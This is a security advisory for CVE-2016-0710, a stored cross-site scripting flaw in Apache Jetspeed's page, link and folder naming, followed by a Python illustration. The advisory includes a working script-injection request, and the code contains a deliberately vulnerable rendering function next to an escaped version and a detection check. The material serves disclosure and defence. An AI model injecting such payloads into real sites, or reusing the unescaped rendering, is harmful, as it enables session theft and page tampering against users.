CVE-2016-0710: Persistent Cross Site Scripting in links, pages and folders

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Jetspeed 2.2.0 to 2.2.2
Jetspeed 2.3.0
The unsupported Jetspeed 2.1.x versions may also be affected.

Description:
The functionality to add a link, page, or folder is vulnerable to persistent Cross Site Scripting, because HTML tags can be included in the object's name. The example below shows a page object being renamed after creation.

Mitigation:
2.2.0 - 2.3.0 users should upgrade to 2.3.1

Example:
Given this AJAX request:

POST /jetspeed/services/pagemanagement/info/.psml/_user/andreas/foobar.psml?_type=json HTTP/1.1
Host: 192.168.2.4:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.2.4:8080/jetspeed/ui/_user/andreas/foobar.psml
Content-Length: 60
Cookie: JSESSIONID=F95E2034A086BE172EF816FF2C853BE9; JS2TOOLBOX=TAB=theme&CAT=Administration
Connection: close

title=foobar</a></li><script>alert(document.domain)</script>

Which results in the following content in the server response:

<meta http-equiv="content-type" content="text/html; charset=UTF-8"/>
<title>foobar</a></li><script>alert(document.domain)</script></title>

Note that this script is executed every time someone visits that space, since the name is stored and rendered unescaped on each view.

Credit:
This issue was discovered by Andreas Lindh

References:
http://tomcat.apache.org/security.html
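As an added illustration, not part of the advisory or of Jetspeed's own code, the Python below contrasts the verbatim rendering the advisory shows with an output-encoded rendering of the same object name, and adds an input-side check a defender could run over request bodies. The sample bodies are constructed from the advisory's request; the function names and the tag regex are assumptions of this example.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample bodies: the first reproduces the form body quoted in the
# advisory, the second is an ordinary rename of a page object.
MALICIOUS_BODY = "title=foobar</a></li><script>alert(document.domain)</script>"
BENIGN_BODY = "title=My+Portal+Page"

# Assumed (simplified) tag pattern: good enough to spot markup in a short name.
TAG_RE = re.compile(r"</?[A-Za-z][^>]*>")


def title_from_body(body: str) -> str:
    """Read the 'title' form field the way a URL-encoded form handler would."""
    return parse_qs(body, keep_blank_values=True).get("title", [""])[0]


def render_title_vulnerable(name: str) -> str:
    """Verbatim concatenation, the pattern behind the advisory: markup in the
    object name becomes markup in every page that displays the name."""
    return f"<title>{name}</title>"


def render_title_hardened(name: str) -> str:
    """Output encoding: '<', '>', '&' and quotes become entities, so the browser
    shows the name as text and never parses it as tags."""
    return f"<title>{html.escape(name, quote=True)}</title>"


def injected_tags(rendered: str) -> list:
    """Tags present in the rendered fragment other than the enclosing <title>."""
    return [t for t in TAG_RE.findall(rendered)
            if t.lower() not in ("<title>", "</title>")]


def suspicious_rename(body: str) -> bool:
    """Input-side check for request logs or a WAF rule: flags a rename whose
    decoded title carries HTML markup. Defence in depth only; output encoding
    is what actually prevents the XSS."""
    return bool(TAG_RE.search(title_from_body(body)))


if __name__ == "__main__":
    name = title_from_body(MALICIOUS_BODY)
    print(render_title_vulnerable(name))  # tags from the name land in the page
    print(render_title_hardened(name))    # same name, emitted as inert text
```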